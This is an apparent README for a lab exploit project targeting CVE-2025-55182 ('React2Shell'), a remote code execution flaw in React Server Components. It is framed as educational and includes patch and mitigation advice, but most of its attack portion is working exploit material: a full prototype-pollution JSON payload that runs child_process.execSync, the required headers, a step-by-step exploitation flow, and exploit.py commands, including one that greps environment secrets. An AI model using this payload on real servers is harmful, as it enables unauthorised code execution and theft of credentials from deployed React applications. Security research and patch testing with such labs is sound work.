Share
## https://sploitus.com/exploit?id=16B8B7D9-18EF-5794-ADBD-8D901B835F0C
# CVE-2025-55182 (React2Shell) - Vulnerable Lab


## Overview
Vulnerable lab demonstrating **CVE-2025-55182 (React2Shell)** - a critical RCE vulnerability in React Server Components.
**โ ๏ธ FOR EDUCATIONAL PURPOSES ONLY**
---
## Vulnerability Details
- **CVE ID**: CVE-2025-55182
- **Type**: Remote Code Execution via Prototype Pollution
- **CVSS**: 9.8 (CRITICAL)
- **Affected**: React 19.0.0, 19.1.0, 19.1.1, 19.2.0
### Attack Vector
React Server Components deserialize FormData unsafely. Specially crafted multipart fields trigger prototype pollution and execute arbitrary code via `child_process.execSync`.
---
## Quick Setup
```bash
npm install
pip3 install requests
npm run dev
```
Application runs at: **http://localhost:3000**
---
## Exploitation
### Basic Usage
```bash
python3 exploit.py -c "whoami"
```
### Command Examples
```bash
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"
```
### Interactive Mode
```bash
python3 exploit.py -i
```
```
> whoami
COMMAND RESULT:
your-username
============================================================
> pwd
COMMAND RESULT:
/path/to/project
============================================================
> exit
```
---
## How It Works
### Payload Structure
```json
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {"get": "$1:constructor:constructor"}
}
}
```
### Exploitation Flow
```
1. Send multipart with 3 fields (0, 1, 2)
2. React deserializes field 0
3. Prototype pollution via "then": "$1:__proto__:then"
4. $B1337 triggers polluted object processing
5. _response._prefix executed
6. child_process.execSync runs command
7. Result exfiltrated via NEXT_REDIRECT digest
8. RCE achieved
```
---
## Required Headers
```
Next-Action: x
Accept: text/x-component
Content-Type: multipart/form-data
```
---
## Mitigation
### Update React
```bash
npm install react@19.0.1 react-dom@19.0.1
```
### Patched Versions
- React 19.0.1+
- React 19.1.2+
- React 19.2.1+
---
## Project Structure
```
โโโ src/app/
โ โโโ page.tsx # Simple vulnerable form
โ โโโ actions.ts # Vulnerable Server Action
โโโ exploit.py # Python exploit
โโโ README.md
```
---
## Testing
### Terminal 1: Start server
```bash
npm run dev
```
### Terminal 2: Run exploit
```bash
python3 exploit.py -c "whoami"
```
### Verbose Mode
```bash
python3 exploit.py -c "whoami" -v
```
Shows full payload structure and server response
---
## References
- [CVE-2025-55182 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [React Security](https://github.com/facebook/react/security)
- [OWASP Deserialization](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
---
## Legal
- For educational purposes only
- Use in isolated environments
- Never test without authorization
- Unauthorized exploitation is illegal
---
**Lab ready for CVE-2025-55182 research**